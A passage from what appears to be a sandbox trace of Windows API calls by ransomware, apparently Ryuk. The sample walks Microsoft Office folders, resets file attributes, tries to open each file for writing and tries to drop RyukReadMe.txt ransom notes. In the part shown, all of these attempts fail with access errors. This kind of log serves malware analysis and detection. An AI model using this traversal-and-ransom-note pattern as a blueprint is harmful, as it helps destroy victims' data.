(hObject=0xffffffffffffffff) returned 0 [0136.644] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.644] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0136.644] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.644] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\BORDERS\\MSART13.BDR", dwFileAttributes=0x80) returned 0 [0136.644] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\BORDERS\\MSART13.BDR" (normalized: "c:\\program files\\microsoft office\\office14\\borders\\msart13.bdr"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.645] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.645] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.645] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0136.645] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.645] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\BORDERS\\MSART14.BDR", dwFileAttributes=0x80) returned 0 [0136.645] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\BORDERS\\MSART14.BDR" (normalized: "c:\\program files\\microsoft office\\office14\\borders\\msart14.bdr"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.645] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.645] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.645] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0136.645] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.645] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\BORDERS\\MSART15.BDR", dwFileAttributes=0x80) returned 0 [0136.646] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\BORDERS\\MSART15.BDR" (normalized: "c:\\program files\\microsoft office\\office14\\borders\\msart15.bdr"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.646] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.646] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.646] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0136.646] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.646] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\BORDERS\\MSART2.BDR", dwFileAttributes=0x80) returned 0 [0136.647] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\BORDERS\\MSART2.BDR" (normalized: "c:\\program files\\microsoft office\\office14\\borders\\msart2.bdr"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.647] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.647] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.647] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0136.647] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.647] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\BORDERS\\MSART3.BDR", dwFileAttributes=0x80) returned 0 [0136.648] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\BORDERS\\MSART3.BDR" (normalized: "c:\\program files\\microsoft office\\office14\\borders\\msart3.bdr"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.648] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.648] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.648] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0136.648] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.648] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\BORDERS\\MSART4.BDR", dwFileAttributes=0x80) returned 0 [0136.648] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\BORDERS\\MSART4.BDR" (normalized: "c:\\program files\\microsoft office\\office14\\borders\\msart4.bdr"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.648] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.648] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.649] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0136.649] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.649] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\BORDERS\\MSART5.BDR", dwFileAttributes=0x80) returned 0 [0136.649] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\BORDERS\\MSART5.BDR" (normalized: "c:\\program files\\microsoft office\\office14\\borders\\msart5.bdr"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.649] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.649] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.649] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0136.649] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.649] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\BORDERS\\MSART6.BDR", dwFileAttributes=0x80) returned 0 [0136.649] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\BORDERS\\MSART6.BDR" (normalized: "c:\\program files\\microsoft office\\office14\\borders\\msart6.bdr"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.649] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.650] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.650] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0136.650] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.650] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\BORDERS\\MSART7.BDR", dwFileAttributes=0x80) returned 0 [0136.650] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\BORDERS\\MSART7.BDR" (normalized: "c:\\program files\\microsoft office\\office14\\borders\\msart7.bdr"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.650] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.650] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.650] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0136.650] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.650] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\BORDERS\\MSART8.BDR", dwFileAttributes=0x80) returned 0 [0136.651] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\BORDERS\\MSART8.BDR" (normalized: "c:\\program files\\microsoft office\\office14\\borders\\msart8.bdr"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.651] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.651] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.651] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0136.651] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.651] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\BORDERS\\MSART9.BDR", dwFileAttributes=0x80) returned 0 [0136.651] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\BORDERS\\MSART9.BDR" (normalized: "c:\\program files\\microsoft office\\office14\\borders\\msart9.bdr"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.651] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.651] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.651] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 0 [0136.651] FindClose (in: hFindFile=0x3bd480 | out: hFindFile=0x3bd480) returned 1 [0136.652] SetLastError (dwErrCode=0x0) [0136.652] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\BORDERS\\RyukReadMe.txt" (normalized: "c:\\program files\\microsoft office\\office14\\borders\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.655] GetLastError () returned 0x5 [0136.655] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ad1f0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ad1f0, lpOverlapped=0x0) returned 0 [0136.655] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.655] FindNextFileW (in: hFindFile=0x3bd420, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0136.655] FindNextFileW (in: hFindFile=0x3bd420, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0136.655] FindNextFileW (in: hFindFile=0x3bd420, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0136.655] FindNextFileW (in: hFindFile=0x3bd420, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0136.655] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.655] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\CGMIMP32.HLP", dwFileAttributes=0x80) returned 0 [0136.655] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\CGMIMP32.HLP" (normalized: "c:\\program files\\microsoft office\\office14\\cgmimp32.hlp"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.655] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.655] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.655] FindNextFileW (in: hFindFile=0x3bd420, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0136.655] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.656] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\CharSetTable.chr", dwFileAttributes=0x80) returned 0 [0136.656] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\CharSetTable.chr" (normalized: "c:\\program files\\microsoft office\\office14\\charsettable.chr"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.656] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.656] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.656] FindNextFileW (in: hFindFile=0x3bd420, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0136.656] FindNextFileW (in: hFindFile=0x3bd420, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0136.656] FindNextFileW (in: hFindFile=0x3bd420, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0136.656] FindNextFileW (in: hFindFile=0x3bd420, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0136.656] FindNextFileW (in: hFindFile=0x3bd420, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0136.656] FindNextFileW (in: hFindFile=0x3bd420, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0136.656] FindNextFileW (in: hFindFile=0x3bd420, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0136.656] SetLastError (dwErrCode=0x0) [0136.656] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\RyukReadMe.txt" (normalized: "c:\\program files\\microsoft office\\office14\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.656] GetLastError () returned 0x5 [0136.656] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ad1f0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ad1f0, lpOverlapped=0x0) returned 0 [0136.656] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.656] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\CONVERT\\*.*", lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 0x3bd480 [0136.658] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0136.658] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0136.658] SetLastError (dwErrCode=0x0) [0136.658] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\CONVERT\\RyukReadMe.txt" (normalized: "c:\\program files\\microsoft office\\office14\\convert\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.659] GetLastError () returned 0x5 [0136.659] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0) returned 0 [0136.659] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.659] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\CONVERT\\1033\\*.*", lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 0x3bb4e0 [0136.660] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0136.660] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0136.660] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.661] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\CONVERT\\1033\\ACT3R.SAM", dwFileAttributes=0x80) returned 0 [0136.661] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\CONVERT\\1033\\ACT3R.SAM" (normalized: "c:\\program files\\microsoft office\\office14\\convert\\1033\\act3r.sam"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.661] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.661] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.661] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0136.661] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.661] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\CONVERT\\1033\\DELIMR.FAE", dwFileAttributes=0x80) returned 0 [0136.662] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\CONVERT\\1033\\DELIMR.FAE" (normalized: "c:\\program files\\microsoft office\\office14\\convert\\1033\\delimr.fae"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.662] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.662] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.662] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0136.662] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0136.662] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.662] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\CONVERT\\1033\\ODBCR.SAM", dwFileAttributes=0x80) returned 0 [0136.663] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\CONVERT\\1033\\ODBCR.SAM" (normalized: "c:\\program files\\microsoft office\\office14\\convert\\1033\\odbcr.sam"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.663] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.663] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.663] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0136.663] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.663] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\CONVERT\\1033\\OLADDR.FAE", dwFileAttributes=0x80) returned 0 [0136.664] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\CONVERT\\1033\\OLADDR.FAE" (normalized: "c:\\program files\\microsoft office\\office14\\convert\\1033\\oladdr.fae"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.664] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.664] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.664] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0136.664] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.665] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\CONVERT\\1033\\OLAPPTR.FAE", dwFileAttributes=0x80) returned 0 [0136.665] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\CONVERT\\1033\\OLAPPTR.FAE" (normalized: "c:\\program files\\microsoft office\\office14\\convert\\1033\\olapptr.fae"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.665] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.665] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.665] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0136.665] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.665] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\CONVERT\\1033\\OLJRNLR.FAE", dwFileAttributes=0x80) returned 0 [0136.665] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\CONVERT\\1033\\OLJRNLR.FAE" (normalized: "c:\\program files\\microsoft office\\office14\\convert\\1033\\oljrnlr.fae"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.665] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.665] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.665] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0136.666] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.666] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\CONVERT\\1033\\OLMAILR.FAE", dwFileAttributes=0x80) returned 0 [0136.666] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\CONVERT\\1033\\OLMAILR.FAE" (normalized: "c:\\program files\\microsoft office\\office14\\convert\\1033\\olmailr.fae"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.666] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.666] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.666] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0136.666] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.666] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\CONVERT\\1033\\OLNOTER.FAE", dwFileAttributes=0x80) returned 0 [0136.667] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\CONVERT\\1033\\OLNOTER.FAE" (normalized: "c:\\program files\\microsoft office\\office14\\convert\\1033\\olnoter.fae"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.667] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.667] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.667] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0136.667] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.667] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\CONVERT\\1033\\OLR.SAM", dwFileAttributes=0x80) returned 0 [0136.667] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\CONVERT\\1033\\OLR.SAM" (normalized: "c:\\program files\\microsoft office\\office14\\convert\\1033\\olr.sam"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.667] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.668] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.668] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0136.668] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.668] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\CONVERT\\1033\\OLTASKR.FAE", dwFileAttributes=0x80) returned 0 [0136.668] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\CONVERT\\1033\\OLTASKR.FAE" (normalized: "c:\\program files\\microsoft office\\office14\\convert\\1033\\oltaskr.fae"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.668] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.668] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.668] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0136.668] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.668] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\CONVERT\\1033\\ORG97R.SAM", dwFileAttributes=0x80) returned 0 [0136.669] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\CONVERT\\1033\\ORG97R.SAM" (normalized: "c:\\program files\\microsoft office\\office14\\convert\\1033\\org97r.sam"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.669] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.669] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.669] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0136.669] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.669] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\CONVERT\\1033\\PABR.SAM", dwFileAttributes=0x80) returned 0 [0136.669] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\CONVERT\\1033\\PABR.SAM" (normalized: "c:\\program files\\microsoft office\\office14\\convert\\1033\\pabr.sam"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.669] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.669] 